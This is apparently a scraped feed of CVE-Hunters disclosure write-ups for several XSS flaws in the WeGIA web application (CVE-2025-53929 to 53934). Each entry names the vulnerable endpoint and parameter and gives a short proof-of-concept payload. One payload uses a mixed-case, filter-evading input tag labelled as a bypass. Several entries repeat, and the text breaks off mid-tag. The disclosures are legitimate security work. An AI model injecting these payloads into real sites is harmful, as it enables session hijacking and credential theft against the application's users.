id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_cor.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cor</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page <code>cadastro_pet.php</code> is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_cor.php</code></p> <p>Parameter: <code>cor</code></p> <p>Trigger XSS: <code>/html/pet/cadastro_pet.php</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cor</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53929/image.png" width="809" height="498" srcset="/p/cve-2025-53929/image_hu_53ddbaf9c4cb2957.png 480w, /p/cve-2025-53929/image_hu_37121886be6a1b9a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="162" data-flex-basis="389px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrwj-rf3q-3rqj</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53930/ https://www.cvehunters.com/p/cve-2025-53930/ <h2 id="cve-2025-53930-cross-site-scripting-xss-stored-endpoint-adicionar_especiephp-parameter-especie">CVE-2025-53930: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_especie.php</code> parameter <code>especie</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53930" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53930</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_especie.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>especie</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_especie.php</code></p><h2 id="cve-2025-53930-cross-site-scripting-xss-stored-endpoint-adicionar_especiephp-parameter-especie">CVE-2025-53930: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_especie.php</code> parameter <code>especie</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53930" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53930</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_especie.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>especie</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_especie.php</code></p> <p>Parameter: <code>especie</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>especie</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53930/image.png" width="1325" height="311" srcset="/p/cve-2025-53930/image_hu_e1e18487d5585a94.png 480w, /p/cve-2025-53930/image_hu_fad609f1d6c9aa79.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="426" data-flex-basis="1022px" /></p> <p><img src="/p/cve-2025-53930/image-1.png" width="1268" height="246" srcset="/p/cve-2025-53930/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53930/image-1_hu_4cccc1269b2a5680.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="515" data-flex-basis="1237px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-cxx4-6x69-vg4x</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53931/ https://www.cvehunters.com/p/cve-2025-53931/ <h2 id="cve-2025-53931-cross-site-scripting-xss-stored-endpoint-adicionar_racaphp-parameter-raca">CVE-2025-53931: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_raca.php</code> parameter <code>raca</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53931" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53931</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_raca.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>raca</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_raca.php</code></p><h2 id="cve-2025-53931-cross-site-scripting-xss-stored-endpoint-adicionar_racaphp-parameter-raca">CVE-2025-53931: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_raca.php</code> parameter <code>raca</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53931" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53931</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_raca.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>raca</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/pet/adicionar_raca.php</code></p> <p>Parameter: <code>raca</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>raca</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53931/image.png" width="1321" height="325" srcset="/p/cve-2025-53931/image_hu_2ea3161f08493fe2.png 480w, /p/cve-2025-53931/image_hu_abc31e9ddb1e0d31.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="406" data-flex-basis="975px" /></p> <p><img src="/p/cve-2025-53931/image-1.png" width="1268" height="246" srcset="/p/cve-2025-53931/image-1_hu_a9011363d8bed49b.png 480w, /p/cve-2025-53931/image-1_hu_4cccc1269b2a5680.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="515" data-flex-basis="1237px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9mfp-wfmj-cg3j</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53932/ https://www.cvehunters.com/p/cve-2025-53932/ <h2 id="cve-2025-53932-cross-site-scripting-xss-reflected-endpoint-cadastro_adotantephp-parameter-cpf">CVE-2025-53932: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_adotante.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53932" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53932</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_adotante.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>cpf</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/pet/adotantes/cadastro_adotante.php</code></p> <p>Parameter: <code>cpf</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="s2">"><iNput///type="</span><span class="nx">password</span><span class="s2">"////id="</span><span class="nx">CF</span><span class="o">-</span><span class="nx">bypaSS</span><span class="s2">"%20name="</span><span class="nx">query</span><span class="s2">"////value=""///oNfocUs="</span><span class="nx">alert</span><span class="p">(</span><span class="o">%</span><span class="mi">27</span><span class="nx">chux</span><span class="o">%</span><span class="mi">27</span><span class="p">)</span><span class="s2">"%20AutOfoCus="</span><span class="err">"</span><span class="o">%</span><span class="mi">20</span><span class="o">/></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53932/image.png" width="1359" height="314" srcset="/p/cve-2025-53932/image_hu_f54c74625795f79f.png 480w, /p/cve-2025-53932/image_hu_1a0f9a99ae4c4208.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="432" data-flex-basis="1038px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-53932-cross-site-scripting-xss-reflected-endpoint-cadastro_adotantephp-parameter-cpf">CVE-2025-53932: Cross-Site Scripting (XSS) Reflected endpoint <code>cadastro_adotante.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53932" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53932</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_adotante.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>cpf</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/pet/adotantes/cadastro_adotante.php</code></p> <p>Parameter: <code>cpf</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="s2">"><iNput///type="</span><span class="nx">password</span><span class="s2">"////id="</span><span class="nx">CF</span><span class="o">-</span><span class="nx">bypaSS</span><span class="s2">"%20name="</span><span class="nx">query</span><span class="s2">"////value=""///oNfocUs="</span><span class="nx">alert</span><span class="p">(</span><span class="o">%</span><span class="mi">27</span><span class="nx">chux</span><span class="o">%</span><span class="mi">27</span><span class="p">)</span><span class="s2">"%20AutOfoCus="</span><span class="err">"</span><span class="o">%</span><span class="mi">20</span><span class="o">/></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53932/image.png" width="1359" height="314" srcset="/p/cve-2025-53932/image_hu_f54c74625795f79f.png 480w, /p/cve-2025-53932/image_hu_1a0f9a99ae4c4208.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="432" data-flex-basis="1038px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-3vfw-749q-qp6r</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53933/ https://www.cvehunters.com/p/cve-2025-53933/ <h2 id="cve-2025-53933-cross-site-scripting-xss-stored-endpoint-adicionar_enfermidadephp-parameter-nome">CVE-2025-53933: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_enfermidade.php</code> parameter <code>nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53933" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53933</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_enfermidade.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/saude/adicionar_enfermidade.php</code></p><h2 id="cve-2025-53933-cross-site-scripting-xss-stored-endpoint-adicionar_enfermidadephp-parameter-nome">CVE-2025-53933: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_enfermidade.php</code> parameter <code>nome</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53933" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53933</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_enfermidade.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>nome</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/saude/adicionar_enfermidade.php</code></p> <p>Parameter: <code>nome</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nome</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/image.png" loading="lazy" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6558-m8rp-5qg6</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53934/ https://www.cvehunters.com/p/cve-2025-53934/ <h2 id="cve-2025-53934-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-descricao_emergencia">CVE-2025-53934: Cross-Site Scripting (XSS) Stored endpoint <code>control.php</code> parameter <code>descricao_emergencia</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53934" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53934</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao_emergencia</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /controle/control.php</code></p><h2 id="cve-2025-53934-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-descricao_emergencia">CVE-2025-53934: Cross-Site Scripting (XSS) Stored endpoint <code>control.php</code> parameter <code>descricao_emergencia</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53934" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53934</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao_emergencia</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /controle/control.php</code></p> <p>Parameter: <code>descricao_emergencia</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>descricao_emergencia</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cimg</span><span class="o">%</span><span class="mi">20</span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="o">%</span><span class="mi">20</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC4'</span><span class="p">)</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53934/image.png" width="663" height="863" srcset="/p/cve-2025-53934/image_hu_e7287864ea99b304.png 480w, /p/cve-2025-53934/image_hu_1028345ab47dc2e9.png 1024w" loading="lazy" 